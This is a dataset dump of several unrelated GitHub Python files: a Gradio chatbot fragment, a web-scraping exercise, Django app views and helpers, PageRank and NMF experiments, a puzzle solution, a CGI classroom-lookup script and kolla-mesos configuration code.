history[-1][1] += text\n print(text, end=end)\n yield history\n yield from unit_tests_from_function(msg, print_text=True, print_function=print_to_console, approx_min_cases_to_cover=10)\n\n def on_submit_click():\n chatbot.clear()\n bot_thread = Thread(target=bot, args=(msg.get(), chatbot))\n bot_thread.start()\n\n response = submit_button.click(user, [msg, chatbot], [msg, chatbot], queue=False).then(\n bot, [msg, chatbot], [chatbot]\n )\n\ndemo.queue()\ndemo.launch()\n","repo_name":"coderfengyun/chat-confluence","sub_path":"unit_test_bot_gradio.py","file_name":"unit_test_bot_gradio.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"4996622586","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\n@Author: LEGEND\n@since: 2019-12-22 11:35:22\n@lastTime: 2020-06-06 17:16:42\n@FilePath: \\Turing\\14-Spider\\v34.py\n@Description: \n@version: \n'''\n\n\nfrom urllib import request\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\n'''\nBeautifulSoup结合正则匹配\n'''\n\nurl = 'http://www.baidu.com'\n\n# rsp = request.urlopen(url)\n# content = rsp.read()\n\nheaders = {\n \"User-Agent\":\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36\"\n}\n\nrsp = requests.get(url,headers=headers)\ncontent = rsp.text\n\n# html字节\"还原\"成html\nsoup = BeautifulSoup(content, 'lxml')\n\nprint(\"==\" * 12)\ntags = soup.find_all(re.compile('^me'), content=\"always\") # 将content作为搜索tag的属性\nfor tag in tags:\n print(tag)\nprint(\"==\" * 12)\n","repo_name":"legend3/Turing","sub_path":"14-Spider/v34.py","file_name":"v34.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21980835980","text":"from 
django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .models import *\nfrom .forms import *\nfrom django.contrib.auth import logout\n\n\n@login_required\ndef about(request):\n\n return render(request, 'about.html')\n\n@login_required\ndef home(request):\n business = Bussiness.objects.all().order_by('-id')\n neighborhoods = NeighborHood.objects.all().order_by('-id')\n\n context = {'business': business, 'neighborhoods': neighborhoods}\n\n return render(request, 'home.html', context)\n\ndef logout_view(request):\n logout(request)\n return redirect('login')\n\n@login_required\ndef profile(request, prof_id):\n user = User.objects.get(pk = prof_id)\n \n profile = profileUser.objects.filter(user=prof_id)\n business = Bussiness.objects.filter(owner=prof_id)\n neighborhood = NeighborHood.objects.filter(resider=prof_id)\n\n return render(request, 'profile.html', {\"profile\": profile, 'business' : business, 'neighborhood' : neighborhood})\n\n\n@login_required\ndef single_hood(request, neib_id):\n hood = NeighborHood.objects.filter(pk = neib_id)\n business = Bussiness.objects.filter(neighborhood=neib_id)\n\n return render(request, 'single_hood.html', {'hoods' : hood, 'business' : business})\n\n@login_required\ndef delete_hood(request, neib_id):\n leave = NeighborHood.objects.filter(pk = neib_id)\n\n return render(request, 'single_hood.html', {'leave': leave})\n@login_required\ndef single_business(request, biz_id):\n biz = Bussiness.objects.filter(pk = biz_id)\n\n return render(request, 'single_biz.html', {'biz': biz})\n\n@login_required\ndef single_neighbor(request, neg_id):\n neighbor = profileUser.objects.filter(user=neg_id)\n\n return render(request,'single_neighbor.html', {'neighbor': neighbor})\n\n\n@login_required\ndef updataProfile(request):\n current_user = request.user\n\n if request.method == 'POST':\n if profileUser.objects.filter(user_id = current_user).exists():\n form = ProfileupdateForm(request.POST, request.FILES, instance= profileUser.objects.get(user_id = current_user))\n\n else:\n form = ProfileupdateForm(request.POST, request.FILES)\n \n if form.is_valid():\n user_prof = form.save(commit=False)\n user_prof.user = current_user\n user_prof.save()\n\n return redirect('profile', current_user.id)\n \n else:\n if profileUser.objects.filter(user_id = current_user).exists():\n form = ProfileupdateForm(instance=profileUser.objects.get(user_id = current_user))\n\n else:\n form = ProfileupdateForm()\n \n return render(request, 'update.html', {'form' : form})\n\n@login_required\ndef create_neigborhood(request):\n\n current_user = request.user\n profile = profileUser.objects.get(user=current_user)\n\n if request.method == 'POST':\n form = NeighborHoodForm(request.POST, request.FILES)\n\n if form.is_valid():\n hood = form.save(commit=False)\n hood.resider = profile\n hood.save()\n print(hood)\n\n return redirect('profile', current_user.id)\n \n else:\n form = NeighborHoodForm()\n\n return render(request, 'neighbor.html', {'form' : form})\n\n@login_required\ndef my_business(request, biz_id):\n business = Bussiness.objects.filter(owner=biz_id)\n hood = NeighborHood.objects.filter(resider=biz_id)\n\n return render(request, 'my_business.html', {'business' : business, 'hood': hood})\n\n\n@login_required\ndef business(request):\n current_user = request.user\n\n profile = profileUser.objects.get(user=current_user)\n\n if request.method == 'POST':\n form = BussinessForm(request.POST, request.FILES)\n\n if form.is_valid():\n business = 
form.save(commit=False)\n business.owner = current_user\n business.save()\n\n return redirect('profile', current_user.id)\n \n else:\n form = BussinessForm()\n \n return render(request, 'business.html', {'form' : form})\n\n\n\n@login_required\ndef posts(request):\n posts = Posts.objects.all().order_by('-id')\n\n return render(request, 'posts.html', {'posts': posts})\n\n@login_required\ndef create_post(request):\n current_user = request.user\n\n profile = profileUser.objects.get(user=current_user)\n\n if request.method == 'POST':\n form = PostForm(request.POST, request.FILES)\n if form.is_valid():\n post = form.save(commit=False)\n post.owner = current_user\n post.save()\n\n return redirect('posts',)\n\n else:\n form = PostForm()\n\n return render(request, 'new_posts.html', {'form' : form})\n\n@login_required\ndef create_health(request):\n current_user = request.user\n profile = profileUser.objects.get(user=current_user)\n\n if request.method == 'POST':\n form = HealthForm(request.POST, request.FILES)\n\n if form.is_valid():\n health = form.save(commit=False)\n health.resider = current_user\n health.save()\n\n return redirect('centers')\n\n else:\n form = HealthForm()\n\n return render(request, 'health.html', {'form': form})\n\n@login_required\ndef centers(request):\n health = Health.objects.all().order_by('-id')\n\n return render(request, 'centers.html', {'health': health})\n\n@login_required\ndef police(request):\n police = Police.objects.all().order_by('-id')\n\n return render(request, 'police.html', {'police': police})\n\n@login_required\ndef create_police(request):\n current_user = request.user\n profile = profileUser.objects.get(user=current_user)\n\n if request.method == 'POST':\n form = PoliceForm(request.POST, request.FILES)\n\n if form.is_valid():\n police = form.save(commit=False)\n police.save()\n\n return redirect('police')\n\n else:\n form = PoliceForm()\n\n return render(request, 'create_police.html', {'form': form})","repo_name":"Brian569/neighbourhood","sub_path":"loop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14305152278","text":"import numpy as np\nimport scipy.sparse\nfrom overrides import overrides\n\nclass PageRank(object) :\n def __init__(self, trans_matrix, dampening_factor=0.8, **kwargs) :\n assert trans_matrix.shape[0] == trans_matrix.shape[1]\n self.num_docs = trans_matrix.shape[0]\n self.matrix = trans_matrix.transpose()\n self.df = dampening_factor\n self.bias = np.repeat(1/self.num_docs, self.num_docs)\n self.interpolation()\n\n def interpolation(self):\n rowwise_sum = self.matrix.transpose().sum(axis=1).view(np.ndarray).squeeze() - 1\n self.inter_factor = -rowwise_sum / self.num_docs\n\n def iteration(self, vector) :\n vector = self.df * self.matrix * vector + (1-self.df) * self.bias + self.df * np.dot(vector, self.inter_factor)\n return vector\n\n def converge(self, init_vector=None, stop_criterion=None) :\n stop_criterion = stop_criterion or 1e-8\n vector = init_vector or np.repeat(1.0/self.num_docs, self.num_docs)\n\n print(\"========== Power Iteration ==========\")\n iter_no = 0\n while True :\n prev_vector = vector.copy()\n vector = self.iteration(vector)\n iter_no += 1\n difference = np.sum(np.abs(vector - prev_vector))\n if iter_no % 10 == 0 :\n print(\"Iter {0:4d} | Difference : {1:4.4f}\".format(iter_no, difference))\n if difference < stop_criterion :\n print(\"Iter {0:4d} | Difference : 
{1:4.4f}\".format(iter_no, difference))\n break\n\n self.ranked_vector = vector\n print(\"================ End ================\")\n\n def scoring_function(self, candidate_index, retrieval_score, ranked_vector, criterion=\"ns\") :\n available_criterion = [\"ns\", \"ws\", \"cm\"]\n assert criterion in available_criterion\n if criterion == \"ns\" :\n score = ranked_vector\n elif criterion == \"ws\" :\n retrieval_weight = 1.\n pagerank_weight = 1.\n retrieval_score /= np.sqrt(sum(retrieval_score ** 2))\n ranked_vector /= np.sqrt(sum(ranked_vector ** 2))\n score = retrieval_weight * retrieval_score + pagerank_weight * ranked_vector\n elif criterion == \"cm\" :\n # score = np.zeros(ranked_vector.shape)\n # score = np.random.randn(*ranked_vector.shape)\n retrieval_score -= np.mean(retrieval_score)\n ranked_vector -= np.mean(ranked_vector)\n score = np.tanh(retrieval_score) + np.tanh(ranked_vector)\n\n score_ranking = np.argsort(score)[::-1]\n if candidate_index is None :\n candidate_index = [i for i in range(len(ranked_vector))]\n sorted_index = np.array(candidate_index)[score_ranking]\n sorted_score = score[score_ranking]\n return sorted_index, sorted_score\n\n def ranking(self, candidate_index, retrieval_score, criterion=\"ns\", stop_criterion=None, pre_computed=True) :\n if not pre_computed :\n self.converge(stop_criterion=stop_criterion)\n pagerank = self.ranked_vector[candidate_index]\n ranking_result = self.scoring_function(candidate_index, retrieval_score, pagerank, criterion=criterion)\n return ranking_result\n\n\nclass TopicSensitivePageRank(PageRank):\n def __init__(self, trans_matrix, topic_matrix, dampening_factor=0.8, topic_factor=0.1):\n super(TopicSensitivePageRank, self).__init__(trans_matrix, dampening_factor=dampening_factor)\n assert dampening_factor + topic_factor <= 1\n self.tf = topic_factor\n self.tmat = topic_matrix\n self.num_topics = topic_matrix.shape[1]\n self.bias = np.vstack([self.bias for _ in range(self.num_topics)]).transpose()\n\n @overrides\n def interpolation(self):\n rowwise_sum = self.matrix.transpose().sum(axis=1).view(np.ndarray).squeeze() - 1\n self.inter_factor = (-rowwise_sum / self.num_docs).reshape(1,-1)\n\n @overrides\n def iteration(self, matrix):\n matrix = self.df * self.matrix * matrix + self.tf * self.tmat + (1 - self.df - self.tf) * self.bias + self.df * np.dot(self.inter_factor,matrix)\n return matrix\n\n @overrides\n def converge(self, init_vector=None, topic_vector=None, stop_criterion=None) :\n stop_criterion = stop_criterion or 1e-8\n matrix = init_vector or np.repeat(1.0/self.num_docs, self.num_docs)\n matrix = np.vstack([matrix for _ in range(self.num_topics)]).transpose()\n\n print(\"========== Power Iteration ==========\")\n iter_no = 0\n while True :\n prev_matrix = matrix.copy()\n matrix = self.iteration(matrix)\n iter_no += 1\n difference = np.sum(np.abs(matrix - prev_matrix)) / self.num_topics\n if iter_no % 10 == 0 :\n print(\"Iter {0:4d} | Difference : {1:4.4f}\".format(iter_no, difference))\n if difference < stop_criterion :\n print(\"Iter {0:4d} | Difference : {1:4.4f}\".format(iter_no, difference))\n break\n\n self.ranked_matrix = matrix\n # print(matrix.sum(axis=0))\n print(\"================ End ================\")\n return matrix\n\n @overrides\n def ranking(self, candidate_index, retrieval_score, topic_probs, criterion=\"ns\", stop_criterion=None, pre_computed=True):\n # topic_probs shape : (12,1)\n if not pre_computed :\n self.converge(stop_criterion=stop_criterion)\n tpagerank = (self.ranked_matrix * 
topic_probs.reshape(12,1)).view(np.ndarray).squeeze()\n tpagerank = tpagerank[candidate_index]\n\n ranking_result = self.scoring_function(candidate_index, retrieval_score, tpagerank, criterion=criterion)\n return ranking_result\n\nif __name__ == \"__main__\" :\n # Test code for evaluating PageRank\n transition_matrix = scipy.sparse.load_npz(\"./data/transition_matrix.npz\")\n doc_topic_matrix = scipy.sparse.load_npz(\"./data/doc_topic_matrix.npz\")\n gpr = PageRank(trans_matrix=transition_matrix, dampening_factor=0.8)\n tspr = TopicSensitivePageRank(trans_matrix=transition_matrix, topic_matrix=doc_topic_matrix, dampening_factor=0.8, topic_factor=0.1)\n\n gpr.converge()\n print(\"Sample Ranked Vector : \", gpr.ranked_vector)\n print(\"GPR Convergence Checked!\")\n tspr.converge()\n print(\"Sample Ranked Matrix : \", tspr.ranked_matrix)\n print(\"TSPR Convergence Checked!\")","repo_name":"matbambbang/PageRank_python","sub_path":"pagerank.py","file_name":"pagerank.py","file_ext":"py","file_size_in_byte":6390,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"70939369449","text":"#!/bin/env python3\n\n# bruteforce is still faster on this scale\n\nN = 29000000\nn = N // 10\n\nhouse = [1]*(n+1)\nfor i in range(2, n+1):\n for j in range(i, n, i):\n house[j] += i\n\nfor i, h in enumerate(house):\n if h >= n:\n print(i)\n break\n\nhouse = [0]+[11]*(50)+[0]*(n-50)\nfor i in range(2, n+1):\n for j in range(i, 51*i, i):\n if j >= n:\n break\n house[j] += i*11\n\nfor i, h in enumerate(house):\n if h >= N:\n print(i)\n break\n","repo_name":"f-koehler/adventofcode","sub_path":"d20.py","file_name":"d20.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6696051499","text":"#!\r\n# -*- coding: utf-8 -*-\r\n\r\nimport cgi\r\nimport pymysql\r\nimport datetime\r\nimport json\r\nimport re\r\n\r\n# 数据库连接信息字典\r\ndef config(database):\r\n db_config = {\r\n \"host\": \"localhost\",\r\n \"port\": 3306,\r\n \"user\": \"你的用户名\",\r\n \"password\": \"你的密码\",\r\n \"database\": database,\r\n \"charset\": \"utf8\"\r\n }\r\n return db_config\r\n\r\n# 数据库连接\r\ndef connect_and_query(query, values, database):\r\n db_config = config(database)\r\n\r\n try:\r\n # 连接数据库\r\n connection = pymysql.connect(**db_config)\r\n\r\n with connection.cursor() as cursor:\r\n # 执行查询语句\r\n cursor.execute(query, values)\r\n result = cursor.fetchall()\r\n\r\n # 提取查询结果中的实际数据部分\r\n data_list = [list(result) for result in result]\r\n data_list = data_list[0]\r\n\r\n return data_list\r\n\r\n except Exception as e:\r\n print(\"Content-type: text/json\\n\")\r\n print(e)\r\n\r\n finally:\r\n # 关闭数据库连接\r\n connection.close()\r\n\r\n\r\n# 获取今天的日期\r\ntoday = datetime.datetime.today()\r\n\r\n# 获取今天是星期几(0表示星期一,6表示星期日)\r\nday_of_week = today.weekday()\r\n\r\n# 提取年、月、日\r\nyear = today.year\r\nmonth = today.month\r\nday = today.day\r\n\r\n# 拼接为年.月.日的字符串\r\nyear_month_day = f\"{year}.{month}.{day}\" # 表名\r\n\r\n# 获取传递的参数\r\nform = cgi.FieldStorage()\r\nbuildingName = json.loads(form.getvalue('buildingName'))\r\nclassroomNumber = json.loads(form.getvalue('classroomNumber'))\r\n\r\n# 查找数据\r\nclassroomState = [None, None, None] # 结果\r\nfor i in range(3):\r\n if (buildingName[i] is not None):\r\n q = f\"SELECT * FROM `{year_month_day}` WHERE classroom = %s\"\r\n classroomState[i] = connect_and_query(q, (classroomNumber[i],), buildingName[i])\r\n else:\r\n classroomState[i] = None\r\n\r\n# 
构建结果字典\r\nresult_dict = {'classroomState': classroomState, 'today_name': day_of_week}\r\n\r\n# 将结果字典转换为 JSON 格式的字符串\r\nresult_json = json.dumps(result_dict, ensure_ascii=True)\r\n# 返回结果\r\nprint(\"Content-type: application/json; charset=utf-8\\n\")\r\nprint(result_json)\r\n","repo_name":"yuer-you/where-to-learn-WeChatAPP","sub_path":"后端/getClassroomCollect.py","file_name":"getClassroomCollect.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"28145665000","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport os.path\n\nfrom kazoo import exceptions as kz_exceptions\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\nimport yaml\n\nfrom kolla_mesos.common import file_utils\nfrom kolla_mesos.common import jinja_utils\nfrom kolla_mesos.common import mesos_utils\nfrom kolla_mesos.common import type_utils\nfrom kolla_mesos import exception\n\nLOG = logging.getLogger()\nCONF = cfg.CONF\nCONF.import_group('kolla', 'kolla_mesos.config.kolla')\nCONF.import_group('kolla', 'kolla_mesos.config.zookeeper')\n\n\ndef write_variables_zookeeper(zk, variables, base_node=None, overwrite=True):\n if base_node is None:\n base_node = os.path.join('kolla', CONF.kolla.deployment_id)\n filter_out = ['groups', 'hostvars', 'kolla_config',\n 'inventory_hostname']\n for var in variables:\n if (var in filter_out):\n LOG.debug('Var \"%s\" with value \"%s\" is filtered out' %\n (var, variables[var]))\n continue\n var_value = variables[var]\n if isinstance(variables[var], dict):\n var_value = json.dumps(variables[var])\n var_path = os.path.join(base_node, 'variables', var)\n if not overwrite and zk.exists(var_path):\n LOG.debug('NOT Updating \"%s\" node in zookeeper(overwrite=False).',\n var_path)\n return\n zk.ensure_path(var_path)\n if var_value is None:\n var_value = ''\n zk.set(var_path, var_value.encode('utf-8'))\n LOG.debug('Updated \"%s\" node in zookeeper.' % var_path)\n\n\ndef get_start_config(config_dir, jinja_vars):\n start_conf = os.path.join(config_dir,\n 'common/kolla-start-config.json')\n # override container_config_directory\n cont_conf_dir = 'zk://%s' % (CONF.zookeeper.host)\n jinja_vars['container_config_directory'] = cont_conf_dir\n jinja_vars['deployment_id'] = CONF.kolla.deployment_id\n kolla_config = jinja_utils.jinja_render(start_conf, jinja_vars)\n kolla_config = kolla_config.replace('\"', '\\\\\"').replace('\\n', '')\n return kolla_config\n\n\ndef write_common_config_to_zookeeper(config_dir, zk, jinja_vars,\n overwrite=True):\n # 1. At first write global tools to ZK. 
FIXME: Make it a common profile\n conf_path = os.path.join(config_dir, 'common',\n 'common_config.yml.j2')\n common_cfg = yaml.load(jinja_utils.jinja_render(conf_path, jinja_vars))\n common_node = os.path.join('kolla', 'common')\n for script in common_cfg:\n script_node = os.path.join(common_node, script)\n if not overwrite and zk.exists(script_node):\n LOG.debug('NOT Updating \"%s\" node in zookeeper(overwrite=False).',\n script_node)\n continue\n\n zk.ensure_path(script_node)\n source_path = common_cfg[script]['source']\n src_file = source_path\n if not source_path.startswith('/'):\n src_file = file_utils.find_file(source_path)\n with open(src_file) as fp:\n content = fp.read()\n zk.set(script_node, content.encode('utf-8'))\n\n\ndef get_variables_from_zookeeper(zk, needed_variables):\n path = os.path.join('/kolla', CONF.kolla.deployment_id, 'variables')\n variables = {}\n for var in needed_variables:\n try:\n variables[str(var)], _stat = zk.get(os.path.join(path, var))\n except kz_exceptions.NoNodeError:\n raise exception.KollaNotFoundException(var, entity='variable')\n\n return variables\n\n\ndef apply_deployment_vars(jvars):\n \"\"\"Applies the orchestration logic defined in globals.yml.\n\n If multinode mode is enabled, then it uses the default constraints.\n And depending on the 'autodetect_resources' option, it figures out\n how many instances of the services should be scheduled.\n If multinode mode is disabled, then it checks whether\n 'mesos_aio_hostname' option is defined. If it is, then the\n constraints for the given host are defined. If not, the constraints\n disappear.\n \"\"\"\n multinode = type_utils.str_to_bool(jvars['multinode'])\n if multinode:\n autodetect_resources = type_utils.str_to_bool(\n jvars['autodetect_resources'])\n if autodetect_resources:\n controller_nodes, compute_nodes, storage_nodes, all_nodes = \\\n mesos_utils.get_number_of_nodes()\n else:\n try:\n controller_nodes = jvars['controller_nodes']\n compute_nodes = jvars['compute_nodes']\n storage_nodes = jvars['storage_nodes']\n except KeyError:\n raise exception.UndefinedOption(\n 'When \"autodetect_resources\" option is disabled, '\n '\"controller_nodes\", \"compute_nodes\" and'\n '\"storage_nodes\" have to be defined.')\n all_nodes = controller_nodes + compute_nodes + storage_nodes\n else:\n controller_nodes = 1\n compute_nodes = 1\n storage_nodes = 1\n all_nodes = 1\n controller_constraints = \"\"\n compute_constraints = \"\"\n controller_compute_constraints = \"\"\n storage_constraints = \"\"\n mesos_aio_hostname = jvars.get('mesos_aio_hostname')\n if mesos_aio_hostname is not None:\n constraints = '[[\"hostname\", \"CLUSTER\", \"%s\"]]' % \\\n mesos_aio_hostname\n controller_constraints = constraints\n compute_constraints = constraints\n controller_compute_constraints = constraints\n storage_constraints = constraints\n jvars.update({\n 'controller_constraints': controller_constraints,\n 'compute_constraints': compute_constraints,\n 'controller_compute_constraints':\n controller_compute_constraints,\n 'storage_constraints': storage_constraints\n }, force=True)\n jvars.update({\n 'controller_nodes': str(controller_nodes),\n 'compute_nodes': str(compute_nodes),\n 'storage_nodes': str(storage_nodes),\n 'all_nodes': str(all_nodes)\n }, force=True)\n\n\ndef get_marathon_framework(jvars):\n try:\n mframework = jvars['marathon_framework']\n except KeyError:\n mframework = mesos_utils.get_marathon()\n if mframework is not None:\n jvars.update({'marathon_framework': mframework})\n else:\n raise 
exception.UndefinedOption(\n 'Please define marathon_framework')\n LOG.info('Marathon framework: %s' % mframework)\n","repo_name":"nhlfr/kolla-mesos","sub_path":"kolla_mesos/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":7080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24737147234","text":"from api.models import *\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect\n\n\ndef is_post(request):\n return request.method == 'POST'\n\n\ndef get_random_user(request):\n random_user = []\n all_profile = Profile.objects.all()\n current_profile = Profile.objects.get(user=request.user)\n all_followed = get_follower_list(current_profile)\n for profile in all_profile:\n if profile not in random_user:\n if profile != current_profile:\n if profile not in all_followed:\n random_user.append(profile)\n\n return random_user\n\n\ndef get_follower_list(user):\n follows = Follow.objects.all()\n followed_user_list = []\n for f in follows:\n if f.following_user == user:\n followed_user_list.append(f.followed_user)\n return followed_user_list\n\n\ndef get_following_list(user):\n follows = Follow.objects.all()\n following_user_list = []\n for f in follows:\n if f.followed_user == user:\n following_user_list.append(f.following_user)\n return following_user_list\n\n\ndef create_if_vote_dont_exist(data, post_data, user_data, v_flag_data=None):\n if not data.objects.filter(post_id=post_data, user_id=user_data).exists():\n v = Vote(user_id=user_data, post_id=post_data, v_flag=v_flag_data)\n v.save()\n\n\ndef un_vote(data, post_data, user_data):\n data.objects.filter(\n post_id=post_data, user_id=user_data).delete()\n Notification.objects.filter(\n notification_type=1, to_user=post_data.user_id.user, from_user=user_data.user, post=post_data).delete()\n Notification.objects.filter(\n notification_type=4, to_user=post_data.user_id.user, from_user=user_data.user, post=post_data).delete()\n\n\ndef up_vote(data, post_data, user_data):\n data.objects.filter(\n post_id=post_data, user_id=user_data).update(v_flag=True)\n Notification.objects.create(\n notification_type=1, to_user=post_data.user_id.user, from_user=user_data.user, post=post_data)\n\n\ndef down_vote(data, post_data, user_data):\n data.objects.filter(\n post_id=post_data, user_id=user_data).update(v_flag=False)\n Notification.objects.create(\n notification_type=4, to_user=post_data.user_id.user, from_user=user_data.user, post=post_data)\n\n\ndef vote(request, selected_up_vote_btn, selected_down_vote_btn, post_id, user_id):\n if selected_up_vote_btn in request.POST:\n create_if_vote_dont_exist(Vote, post_id, user_id)\n current_selected_vote = Vote.objects.get(\n post_id=post_id, user_id=user_id)\n if current_selected_vote.v_flag != True:\n up_vote(Vote, post_id, user_id)\n else:\n un_vote(Vote, post_id, user_id)\n if selected_down_vote_btn in request.POST:\n create_if_vote_dont_exist(Vote, post_id, user_id)\n current_selected_vote = Vote.objects.get(\n post_id=post_id, user_id=user_id)\n if current_selected_vote.v_flag != False:\n down_vote(Vote, post_id, user_id)\n else:\n un_vote(Vote, post_id, user_id)\n\n\ndef comment(request, comment_form, post, current_profile):\n parent_obj = None\n try:\n parent_id = int(request.POST['parent_id'])\n except:\n parent_id = None\n if is_comment_have_parent(parent_id):\n parent_obj = 
Comment.objects.get(id=parent_id)\n if is_parent_obj_exist(parent_obj):\n replay_comment = comment_form.save(commit=False)\n replay_comment.parent = parent_obj\n save_comment(comment_form, post, current_profile)\n\n\ndef is_comment_have_parent(parent_id):\n return True if parent_id else None\n\n\ndef is_parent_obj_exist(parent_obj):\n return True if parent_obj else None\n\n\ndef save_comment(comment_form, post, current_profile):\n new_comment = comment_form.save(commit=False)\n # assign ship to the comment\n new_comment.post_id = post\n new_comment.user_id = current_profile\n\n new_comment.depth += 2\n if new_comment.parent:\n new_comment.depth += new_comment.parent.depth\n # new_comment.user_id = current_user\n # save\n\n new_comment.save()\n user = get_user(post)\n notification = Notification.objects.create(\n notification_type=2, to_user=user, comment=new_comment)\n\n\ndef get_user(post):\n userprofile = post.user_id\n user = userprofile.user\n\n return user\n\n\ndef get_single_post_vote(request, post):\n vote_list = {}\n current_vote = Vote.objects.filter(post_id=post)\n vote_list[post] = current_vote\n\n return vote_list\n\n\ndef get_multiple_post_vote(request, posts):\n vote_list = {}\n for post in posts:\n current_vote = Vote.objects.filter(post_id=post)\n vote_list[post] = current_vote\n return vote_list\n\n\ndef voting_on_multiple_post_page(request, posts):\n votes = {}\n for post in posts:\n create_rank_of_post(request, post)\n selected_up_vote_btn = f'upvote-{post.get_id()}'\n selected_down_vote_btn = f'downvote-{post.get_id()}'\n current_vote = Vote.objects.filter(post_id=post)\n votes[post] = current_vote\n post_id = post\n user_id = request.user\n current_profile = Profile.objects.get(user_id=user_id)\n vote(request, selected_up_vote_btn, selected_down_vote_btn,\n post_id, current_profile)\n calculate_best_score(request, post)\n calculate_controversial_score(request, post)\n\n\ndef voting_on_singular_post_page(request, post):\n votes = {}\n selected_up_vote_btn = f'upvote-{post.id}'\n selected_down_vote_btn = f'downvote-{post.id}'\n current_vote = Vote.objects.filter(post_id=post)\n post_id = post\n user_id = request.user\n current_profile = Profile.objects.get(user_id=user_id)\n vote(request, selected_up_vote_btn, selected_down_vote_btn,\n post_id, current_profile)\n calculate_best_score(request, post)\n calculate_controversial_score(request, post)\n\n\ndef calculate_best_score(request, post):\n post_rank = Rank.objects.get(post_id=post)\n upvote_count = 0\n votes = Vote.objects.filter(post_id=post)\n for vote in votes:\n if vote.v_flag:\n upvote_count += 1\n post_rank.best = upvote_count\n post_rank.save()\n\n\ndef calculate_controversial_score(request, post):\n post_rank = Rank.objects.get(post_id=post)\n down_vote_count = 0\n votes = Vote.objects.filter(post_id=post)\n for vote in votes:\n if not vote.v_flag:\n down_vote_count += 1\n post_rank.controversial = down_vote_count\n post_rank.save()\n\n\ndef create_rank_of_post(request, post):\n if Rank.objects.filter(post_id=post).exists():\n return\n rank = Rank(post_id=post)\n rank.save()\n\n\ndef today_time(time):\n return datetime.datetime.today().replace(hour=time.hour, minute=time.minute, second=time.second,\n microsecond=time.microsecond, tzinfo=time.tzinfo)\n\n\ndef times_to_delta(start_time, end_time):\n return today_time(end_time) - today_time(start_time)\n\n\ndef send_message(request, user_id):\n message_value = request.GET['message']\n print(message_value)\n print(message_value)\n print(message_value)\n 
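# (The repeated debug prints above look like leftovers; a single\n    # logging.debug('chat message: %s', message_value) call would carry the same\n    # information. Illustrative suggestion only, not part of the original code.)\n    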
return redirect(f'/chat/{user_id}')\n\n\ndef delete_profile(username):\n    user = User.objects.get(username=username)\n    print(user)\n    delete_profile = Profile.objects.filter(user=user).delete()\n    delete_user = User.objects.filter(username=username).delete()\n\n\ndef delete_notification(user):\n    f_notifications = Notification.objects.filter(from_user=user).delete()\n    t_notifications = Notification.objects.filter(to_user=user).delete()\n\n\ndef delete_follow(following_user, followed_user):\n    delete_follow = Follow.objects.get(\n        following_user=following_user, followed_user=followed_user)\n    delete_follow.delete()\n\n\ndef delete_follow_notifications(following_user, followed_user, type=3):\n    delete_notification = Notification.objects.filter(\n        notification_type=type, from_user=following_user.user, to_user=followed_user.user)\n    delete_notification.delete()\n\n\ndef add_follow(following_user, followed_user):\n    new_follow = Follow.objects.create(\n        following_user=following_user, followed_user=followed_user)\n    new_follow.save()\n\n\ndef add_follow_notifications(following_user, followed_user, type=3):\n    new_notification = Notification.objects.create(\n        notification_type=3, from_user=following_user.user, to_user=followed_user.user)\n    new_notification.save()\n","repo_name":"Ricar1502/Website","sub_path":"snova_social_media/app/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":8638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"1444765313","text":"import numpy as np\nfrom sklearn.decomposition import NMF, non_negative_factorization\n\nR = [\n    [5,3,0,1],\n    [4,0,0,1],\n    [1,1,0,5],\n    [1,0,0,4],\n    [0,1,5,4],\n    ]\n\nR = np.array(R)\nnmf = NMF(n_components=2, init='random', random_state=0)\n\n# Factorize R into non-negative factors W and H\nW = nmf.fit_transform(R)\nH = nmf.components_\nnR = np.dot(W, H)\n\nprint(nmf)\nprint(\"W\")\nprint(W)\nprint(\"H\")\nprint(H)\nprint(R)\nprint(nR)\nS = [\n    [6,4,1,2],\n    ]\n\n# Project a new sample onto the learned components\nnS = nmf.transform(S)\nprint(S)\nprint(nS)\n\n\n# Re-factorize with H held fixed\nfixed_H = H\nW, H, n_iter = non_negative_factorization(R, n_components=2, init='custom', random_state=0, update_H=False, H=fixed_H)\n\n\nprint(\"W\")\nprint(W)\nprint(\"H\")\nprint(H)\n","repo_name":"grenaud/cinch","sub_path":"nmftest.py","file_name":"nmftest.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
